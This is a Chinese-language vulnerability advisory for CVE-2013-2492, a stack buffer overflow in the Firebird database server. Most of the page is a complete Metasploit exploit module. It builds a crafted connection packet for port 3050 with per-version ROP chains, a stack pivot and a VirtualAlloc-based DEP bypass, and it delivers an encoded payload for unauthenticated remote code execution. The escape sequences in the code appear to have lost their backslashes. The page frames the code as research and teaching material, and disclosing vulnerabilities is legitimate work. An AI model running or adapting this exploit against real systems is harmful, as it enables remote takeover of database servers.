Firebird栈缓冲区溢出漏洞（CVE-2013-2492）

发布日期：2013-03-26
更新日期：2013-03-27受影响系统：
Firebird Firebird 2.1.3 - 2.1.5
描述：
--------------------------------------------------------------------------------
CVE（CAN） ID: CVE-2013-2492

Firebird是通用开源数据库。

Firebird服务器易于受到栈缓冲区溢出漏洞的攻击，如果未经身份验证的用户向TCP端口3050发送特制的报文触发此漏洞，可导致远程代码执行。

<*来源：Spencer McIntyre

链接：http://web.nvd.nist.gov/view/vuln/detail？vulnId=CVE-2013-2492
https://gist.github.com/zeroSteiner/85daef257831d904479c
http://www.metasploit.com/modules/exploit/windows/misc/fb_cnct_group
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/misc/fb_cnct_group.rb
*>测试方法：
--------------------------------------------------------------------------------警告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require "msf/core"

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp

def initialize
super（
"Name" => "Firebird Relational Database CNCT Group Number Buffer Overflow",
"Description" => %q{
This module exploits a vulnerability in Firebird SQL Server. A specially
crafted packet can be sent which will overwrite a pointer allowing the attacker to
control where data is read from. Shortly, following the controlled read, the
pointer is called resulting in code execution.

The vulnerability exists with a group number extracted from the CNCT information,
which is sent by the client, and whose size is not properly checked.

This module uses an existing call to memcpy, just prior to the vulnerable code,
which allows a small amount of data to be written to the stack. A two-phases
stackpivot allows to execute the ROP chain which ultimately is used to execute
VirtualAlloc and bypass DEP.
},
"Author" => "Spencer McIntyre",
"Arch" => ARCH_X86,
"Platform" => "win",
"References" =>
[
[ "CVE", "2013-2492" ]
],
"DefaultOptions" =>
{
"EXITFUNC" => "seh"
},
"Payload" =>
{
# Stackpivot => mov eax,fs:[0x18] # add eax,8 # mov esp,[eax]
"Prepend" => "x64xa1x18x00x00x00x83xc0x08x8bx20",
"Space" => 400,
"BadChars" => "x00x0ax0d"
},
"Targets" =>
[
# pivots are pointers to stack pivots of size 0x28
[ "Windows FB 2.5.2.26539", { "pivot" => 0x005ae1fc, "rop_nop" => 0x005b0384, "rop_pop" => 0x4a831344 } ],
[ "Windows FB 2.5.1.26351", { "pivot" => 0x4add2302, "rop_nop" => 0x00424a50, "rop_pop" => 0x00656472 } ],
[ "Windows FB 2.1.5.18496", { "pivot" => 0x4ad5df4d, "rop_nop" => 0x0042ba8c, "rop_pop" => 0x005763d5 } ],
[ "Windows FB 2.1.4.18393", { "pivot" => 0x4adf4ed5, "rop_nop" => 0x00423b82, "rop_pop" => 0x4a843429 } ],
[ "Debug", { "pivot" => 0xdead1337, "rop_nop" => 0xdead1337, "rop_pop" => 0xdead1337 } ]
],
"DefaultTarget" => 0,
"Privileged" => true,
"DisclosureDate" => "Jan 31 2013"
）

register_options（[Opt::RPORT（3050）], self.class）
end

def check
begin
connect
rescue
return Exploit::CheckCode::Safe
end

filename = "C:\#{rand_text_alpha（12）}.fdb"
username = rand_text_alpha（7）

check_data = ""
check_data << "x00x00x00x01x00x00x00x13x00x00x00x02x00x00x00x24"
check_data << "x00x00x00x13"
check_data << filename
check_data << "x00x00x00x00x04x00x00x00x24"
check_data << "x01x07" << username << "x04x15x6cx6fx63x61x6c"
check_data << "x68x6fx73x74x2ex6cx6fx63x61x6cx64x6fx6dx61x69x6e"
check_data << "x06x00x00x00x00x00x00x08x00x00x00x01x00x00x00x02"
check_data << "x00x00x00x05x00x00x00x02x00x00x00x0ax00x00x00x01"
check_data << "x00x00x00x02x00x00x00x05x00x00x00x04xffxffx80x0b"
check_data << "x00x00x00x01x00x00x00x02x00x00x00x05x00x00x00x06"
check_data << "xffxffx80x0cx00x00x00x01x00x00x00x02x00x00x00x05"
check_data << "x00x00x00x08"

sock.put（check_data）
data = sock.recv（16）
disconnect

opcode = data.unpack（"N*"）[0]
version = data.unpack（"N*"）[1]
if opcode == 3 # Accept
if [ 0xffff800b, 0xffff800c ].include？（version）
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Detected
end

return Exploit::CheckCode::Unknown
end

def stack_pivot_rop_chain
case target.name
when "Windows FB 2.5.2.26539"
rop_chain = [
0x005e1ea4, # MOV EAX,EDI # RETN [fbserver.exe]
0x0059ffeb, # POP EBP # RETN [fbserver.exe]
0x0000153c, # 0x0000153c-> ebp
0x005d261f, # ADD EBP,EAX # MOV EBX,59FFFFC9 # RETN [fbserver.exe]
0x0059fe1f, # MOV ESP,EBP # POP EBP # RETN [fbserver.exe]
].pack（"V*"）
when "Windows FB 2.5.1.26351"
rop_chain = [
0x005e1ab8, # MOV EAX,EDI # RETN [fbserver.exe]
0x0059650b, # POP EBP # RETN [fbserver.exe]
0x0000153c, # 0x0000153c-> ebp
0x005cf6ff, # ADD EBP,EAX # MOV EBX,59FFFFC9 # RETN [fbserver.exe]
0x0059a3db, # MOV ESP,EBP # POP EBP # RETN [fbserver.exe]
].pack（"V*"）
when "Windows FB 2.1.5.18496"
rop_chain = [
0x0055b844, # MOV EAX,EDI # RETN [fbserver.exe]
0x4a86ee77, # POP ECX # RETN [icuuc30.dll]
0x000001c0, # 0x000001c0-> ecx
0x005aee63, # ADD EAX,ECX # RETN [fbserver.exe]
0x4a82d326, # XCHG EAX,ESP # RETN [icuuc30.dll]
].pack（"V*"）
when "Windows FB 2.1.4.18393"
rop_chain = [
0x0042264c, # MOV EAX,EDI # RETN [fbserver.exe]
0x4a8026e1, # POP ECX # RETN [icuuc30.dll]
0x000001c0, # 0x000001c0-> ecx
0x004c5499, # ADD EAX,ECX # RETN [fbserver.exe]
0x4a847664, # XCHG EAX,ESP # RETN [icuuc30.dll]
].pack（"V*"）
when "Debug"
rop_chain = [ ].fill（0x41414141, 0..5）.pack（"V*"）
end
return rop_chain
end

def final_rop_chain
# all rop chains in here created with mona.py, thanks corelan！
case target.name
when "Windows FB 2.5.2.26539"
rop_chain = [
0x4a831344, # POP ECX # RETN [icuuc30.dll]
0x0065f16c, # ptr to &VirtualAlloc（） [IAT fbserver.exe]
0x005989f0, # MOV EAX,DWORD PTR DS:[ECX] # RETN [fbserver.exe]
0x004666a6, # XCHG EAX,ESI # RETN [fbserver.exe]
0x00431905, # POP EBP # RETN [fbserver.exe]
0x00401932, # & push esp # ret [fbserver.exe]
0x4a844ac0, # POP EBX # RETN [icuuc30.dll]
0x00001000, # 0x00001000-> ebx
0x4a85bfee, # POP EDX # RETN [icuuc30.dll]
0x00001000, # 0x00001000-> edx
0x005dae9e, # POP ECX # RETN [fbserver.exe]
0x00000040, # 0x00000040-> ecx
0x0057a822, # POP EDI # RETN [fbserver.exe]
0x005b0384, # RETN （ROP NOP） [fbserver.exe]
0x0046f8c3, # POP EAX # RETN [fbserver.exe]
0x90909090, # nop
0x00586002, # PUSHAD # RETN [fbserver.exe]
].pack（"V*"）
when "Windows FB 2.5.1.26351"
rop_chain = [
0x00656472, # POP ECX # RETN [fbserver.exe]
0x0065b16c, # ptr to &VirtualAlloc（） [IAT fbserver.exe]
0x00410940, # MOV EAX,DWORD PTR DS:[ECX] # RETN [fbserver.exe]
0x0063be76, # XCHG EAX,ESI # RETN [fbserver.exe]
0x0041d1ae, # POP EBP # RETN [fbserver.exe]
0x0040917f, # & call esp [fbserver.exe]
0x4a8589c0, # POP EBX # RETN [icuuc30.dll]
0x00001000, # 0x00001000-> ebx
0x4a864cc3, # POP EDX # RETN [icuuc30.dll]
0x00001000, # 0x00001000-> edx
0x0064ef59, # POP ECX # RETN [fbserver.exe]
0x00000040, # 0x00000040-> ecx
0x005979fa, # POP EDI # RETN [fbserver.exe]
0x00424a50, # RETN （ROP NOP） [fbserver.exe]
0x4a86052d, # POP EAX # RETN [icuuc30.dll]
0x90909090, # nop
0x005835f2, # PUSHAD # RETN [fbserver.exe]
].pack（"V*"）
when "Windows FB 2.1.5.18496"
rop_chain = [
0x005763d5, # POP EAX # RETN [fbserver.exe]
0x005ce120, # ptr to &VirtualAlloc（） [IAT fbserver.exe]
0x004865a4, # MOV EAX,DWORD PTR DS:[EAX] # RETN [fbserver.exe]
0x004cf4f6, # XCHG EAX,ESI # RETN [fbserver.exe]
0x004e695a, # POP EBP # RETN [fbserver.exe]
0x004d9e6d, # & jmp esp [fbserver.exe]
0x4a828650, # POP EBX # RETN [icuuc30.dll]
0x00001000, # 0x00001000-> ebx
0x4a85bfee, # POP EDX # RETN [icuuc30.dll]
0x00001000, # 0x00001000-> edx
0x00590328, # POP ECX # RETN [fbserver.exe]
0x00000040, # 0x00000040-> ecx
0x4a8573a1, # POP EDI # RETN [icuuc30.dll]
0x0042ba8c, # RETN （ROP NOP） [fbserver.exe]
0x00577605, # POP EAX # RETN [fbserver.exe]
0x90909090, # nop
0x004530ce, # PUSHAD # RETN [fbserver.exe]
].pack（"V*"）
when "Windows FB 2.1.4.18393"
rop_chain = [
0x4a843429, # POP ECX # RETN [icuuc30.dll]
0x005ca120, # ptr to &VirtualAlloc（） [IAT fbserver.exe]
0x0055a870, # MOV EAX,DWORD PTR DS:[ECX] # RETN [fbserver.exe]
0x004cecf6, # XCHG EAX,ESI # RETN [fbserver.exe]
0x004279c0, # POP EBP # RETN [fbserver.exe]
0x0040747d, # & call esp [fbserver.exe]
0x004ebef1, # POP EBX # RETN [fbserver.exe]
0x00001000, # 0x00001000-> ebx
0x4a864c5e, # POP EDX # RETN [icuuc30.dll]
0x00001000, # 0x00001000-> edx
0x004eaa3b, # POP ECX # RETN [fbserver.exe]
0x00000040, # 0x00000040-> ecx
0x4a8330a2, # POP EDI # RETN [icuuc30.dll]
0x00423b82, # RETN （ROP NOP） [fbserver.exe]
0x0046b5b1, # POP EAX # RETN [fbserver.exe]
0x90909090, # nop
0x004c8cfc, # PUSHAD # RETN [fbserver.exe]
].pack（"V*"）
when "Debug"
rop_chain = [ ].fill（0x41414141, 0..17）.pack（"V*"）
end
return rop_chain
end

def exploit
connect

rop_nop_sled = [ ].fill（target["rop_nop"], 0..16）.pack（"V*"）

# this data gets written to the stack via memcpy, no more than 32 bytes can be written
overwrite_and_rop_chain = [ target["rop_pop"] ].pack（"V"） # POP to skip the 4 bytes of the original pivot
overwrite_and_rop_chain << [ （target["pivot"] - 8） ].pack（"V"） # MOV EDX,DWORD PTR DS:[EAX+8]
overwrite_and_rop_chain << stack_pivot_rop_chain

filename = "C:\#{rand_text_alpha（13）}.fdb"
evil_data = "x00x00x00x01x00x00x00x13x00x00x00x02x00x00x00x24"
evil_data << "x00x00x00x14"
evil_data << filename
evil_data << "x00x00x00x04x00x00x00x24"
evil_data << "x05x20"
evil_data << overwrite_and_rop_chain
evil_data << "x15x6cx6fx63x61x6c"
evil_data << "x68x6fx73x74x2ex6cx6fx63x61x6cx64x6fx6dx61x69x6e"
evil_data << "x06x00x00x00x00x00x00x08x00x00x00x01x00x00x00x02"
evil_data << "x00x00x00x05x00x00x00x02x00x00x00x0ax00x00x00x01"
evil_data << "x00x00x00x02x00x00x00x05x00x00x00x04xffxffx80x0b"
evil_data << "x00x00x00x01x00x00x00x02x00x00x00x05x00x00x00x06"
evil_data << "x41x41x41x41x00x00x00x01x00x00x00x02x00x00x00x05"
evil_data << "x00x00x00x08x00x41x41x41"
evil_data << rop_nop_sled
evil_data << final_rop_chain
evil_data << payload.encoded

print_status（"#{rhost}:#{rport} - Sending Connection Request For #{filename}"）
sock.put（evil_data）

disconnect
end

end建议：
--------------------------------------------------------------------------------
厂商补丁：

Firebird
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.firebirdsql.org/IBM Lotus Domino "x.nsf"多个跨站脚本漏洞Google V8 JavaScript Engine JavaScript处理拒绝服务漏洞相关资讯 FireBird Firebird安全漏洞

FireBird拒绝服务漏洞（CVE-2016- （01月14日）
Firebird 3.0 Alpha 2 发布，数据（02/08/2014 09:59:28）
Firebird 3.0 Alpha1 发布，数据库（08/03/2013 07:31:30）

Firebird 2.5.3 发布下载，数据库（07/19/2014 07:57:20）
Firebird 2.5.2 发布安全更新！（02/08/2014 09:19:32）
Firebird 2.5.2 RC1 发布，关系数（10/05/2012 09:45:31）

本文评论查看全部评论（0）

评论声明

尊重网上道德，遵守中华人民共和国的各项有关法律法规
承担一切因您的行为而直接或间接导致的民事或刑事法律责任
本站管理人员有权保留或删除其管辖留言中的任意内容
本站有权在网站内转载或引用您的评论